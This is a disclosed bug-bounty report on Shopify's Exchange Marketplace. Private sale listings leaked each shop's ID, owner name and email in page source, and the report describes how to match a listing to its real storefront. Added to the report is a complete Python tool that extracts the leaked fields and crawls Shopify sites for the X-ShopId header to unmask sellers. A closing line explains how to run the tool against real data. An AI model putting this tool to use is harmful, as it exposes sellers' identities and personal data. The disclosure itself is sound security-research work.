H1514 Deanonymizing Exchange Marketplace private listings

Disclosed: 2020-03-10 20:38:45 By fisher To shopify
Medium
Vulnerability Details
**Summary:** [Exchange Marketplace](https://exchangemarketplace.com/) lets Shopify shop owners sell their business with little effort. When placing a shop in the listings, the owner can mark it as a private listing: only statistics are displayed, and nothing about the actual shop, its domain name or its owner is visible.

Inspecting the page source, I discovered a `<script>` element generated by [Hypernova](https://github.com/airbnb/hypernova) that discloses exactly that private data:

- Shop ID
- Shop owner name
- Shop owner email

## Steps To Reproduce:

1. Pick a private listing, e.g. [930273](https://exchangemarketplace.com/shops/e834b11e056bd114f8262d0464a512c9).
2. Search the DOM for a `<script>` element containing the string `data-hypernova-key`: {F357502}
3. Its body is a long JSON document that includes the variables listed above: {F357509} {F357510}

This discloses only a few fields, but they are enough to pinpoint the real shop with some recon.

The first method is open-source intelligence: we have the shop owner's name and email. Most businesses are registered on LinkedIn, so a search there or on Google should be enough to find a match.

The second method is far more reliable and can be done in several ways; the easiest is described here. First, the attacker downloads a dataset of all known websites running Shopify, from a service such as [Wappalyzer](https://www.wappalyzer.com) or [BuiltWith](https://builtwith.com): {F357514}

With that dataset, the attacker fetches every site and records the response headers, where Shopify storefronts return an `X-ShopId` header: {F357515}

The attacker now has a direct Shop -> ShopID mapping and can look up the ID taken from the listing, thus deanonymizing the private listing. It is fair to assume that a shop being sold on the Marketplace has a decent amount of traffic, so it will almost certainly be present in one of these datasets.
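The two-stage match described above (pull the hidden fields out of the Hypernova JSON embedded in the listing page, then map `X-ShopId` values from a crawl of known Shopify storefronts back to domains), as an added Python example that is not part of the original report or of Shopify's code. The listing HTML, the JSON field names (`shop_id`, `owner`, `email`), the domain list and the header responses are all constructed so the script runs offline; `http_head_headers` is the live fetcher you would plug in instead of the fake one.

```python
"""Recover a private Exchange listing's shop id and match it to a live domain.

Added illustration, not the reporter's tooling. Field names, sample listing
HTML, domain list and header responses are constructed for an offline run.
"""
import html
import json
import re
import urllib.request
from typing import Callable, Dict, Iterable, Optional

# Hypernova renders server-side props as
#   <script type="application/json" data-hypernova-key="..." data-hypernova-id="...">
#   <!--{json}--></script>
# with '&' and '>' HTML-encoded inside the comment. Key names in the JSON are an
# assumption here; the report only shows that shop id, owner name and email occur.
HYPERNOVA_RE = re.compile(
    r'<script[^>]*data-hypernova-key="(?P<key>[^"]+)"[^>]*>(?P<body>.*?)</script>',
    re.DOTALL,
)
SHOP_ID_KEY_RE = re.compile(r"^shop_?id$", re.IGNORECASE)
SENSITIVE_KEY_RE = re.compile(r"(shop_?id|owner|email|name)", re.IGNORECASE)


def extract_hypernova_payloads(page: str) -> Dict[str, object]:
    """Return {hypernova key: decoded props} for every Hypernova script on the page."""
    found: Dict[str, object] = {}
    for m in HYPERNOVA_RE.finditer(page):
        body = m.group("body").strip()
        if body.startswith("<!--") and body.endswith("-->"):
            body = body[4:-3]  # drop the comment wrapper Hypernova adds
        found[m.group("key")] = json.loads(html.unescape(body))
    return found


def collect_sensitive(props, path: str = "") -> Dict[str, object]:
    """Walk nested props and pick up scalar values under PII-looking keys."""
    hits: Dict[str, object] = {}
    if isinstance(props, dict):
        for k, v in props.items():
            p = f"{path}.{k}" if path else k
            if isinstance(v, (dict, list)):
                hits.update(collect_sensitive(v, p))
            elif SENSITIVE_KEY_RE.search(k):
                hits[p] = v
    elif isinstance(props, list):
        for i, v in enumerate(props):
            hits.update(collect_sensitive(v, f"{path}[{i}]"))
    return hits


def find_shop_id(props) -> Optional[str]:
    """First value stored under a key named shop_id/shopId (assumed name), as a string."""
    if isinstance(props, dict):
        for k, v in props.items():
            if SHOP_ID_KEY_RE.match(k) and not isinstance(v, (dict, list)):
                return str(v)
            sid = find_shop_id(v)
            if sid:
                return sid
    elif isinstance(props, list):
        for v in props:
            sid = find_shop_id(v)
            if sid:
                return sid
    return None


def http_head_headers(domain: str, timeout: float = 5.0) -> Dict[str, str]:
    """Live fetcher: one HEAD request per domain (not called in the offline demo)."""
    req = urllib.request.Request(f"https://{domain}/", method="HEAD",
                                 headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return dict(resp.headers.items())


def build_shop_index(domains: Iterable[str],
                     fetch: Callable[[str], Dict[str, str]]) -> Dict[str, str]:
    """Map X-ShopId -> domain over a dataset of known Shopify sites; skip failures."""
    index: Dict[str, str] = {}
    for d in domains:
        try:
            hdrs = {k.lower(): v for k, v in fetch(d).items()}
        except Exception:  # DNS failure, timeout, non-HTTP host: just move on
            continue
        sid = hdrs.get("x-shopid")
        if sid:
            index[str(sid)] = d
    return index


def deanonymize(listing_html: str, index: Dict[str, str]) -> Optional[str]:
    """Domain of the shop behind a private listing, or None if no id matches."""
    for props in extract_hypernova_payloads(listing_html).values():
        sid = find_shop_id(props)
        if sid and sid in index:
            return index[sid]
    return None


# --- constructed sample data (not real listings, shops or people) ---
SAMPLE_LISTING = """<html><body><div>Private listing: revenue $12k/mo</div>
<script type="application/json" data-hypernova-key="ListingPage" data-hypernova-id="1">
<!--{"listing":{"id":930273,"private":true,"shop_id":8675309,"shop_name":"Jane &amp; Co",
"owner":{"name":"Jane Example","email":"jane@example.com"}},"stats":{"visits":42000}}-->
</script></body></html>"""

FAKE_HEADERS = {
    "shop-a.example": {"Content-Type": "text/html", "X-ShopId": "1111"},
    "jane-and-co.example": {"content-type": "text/html", "X-ShopId": "8675309"},
    "not-shopify.example": {"Content-Type": "text/html"},
}


def fake_fetch(domain: str) -> Dict[str, str]:
    """Stand-in for http_head_headers; unknown domains raise like a dead host would."""
    return FAKE_HEADERS[domain]


if __name__ == "__main__":
    props = extract_hypernova_payloads(SAMPLE_LISTING)["ListingPage"]
    print("leaked fields:", collect_sensitive(props))
    idx = build_shop_index(list(FAKE_HEADERS) + ["down.example"], fake_fetch)
    print("listing resolves to:", deanonymize(SAMPLE_LISTING, idx))
```

Against a real dataset you would swap `fake_fetch` for `http_head_headers`, rate-limit the crawl, and persist the `X-ShopId -> domain` index once, since it changes far less often than the listings do.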
## Impact

An attacker can deanonymize private listings in the Marketplace, learning who the shop owner/seller is and which business is for sale.
Report Stats
  • Report ID: 421009
  • State: Closed
  • Substate: resolved
  • Upvotes: 30